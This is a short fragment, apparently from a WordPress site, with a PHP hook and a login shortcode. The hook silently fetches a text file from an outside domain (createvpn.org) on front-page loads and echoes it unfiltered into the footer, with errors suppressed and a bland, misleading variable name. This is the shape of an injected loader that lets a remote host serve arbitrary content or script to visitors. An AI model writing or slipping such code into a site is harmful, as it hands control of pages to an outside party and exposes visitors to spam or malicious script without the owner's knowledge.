add_action('wp_footer', function() { if (is_front_page()) { $homethemesplugin = @file_get_contents('https://createvpn.org/project/license.txt'); if ($homethemesplugin !== false) { echo $homethemesplugin; } } });
[uwp_login]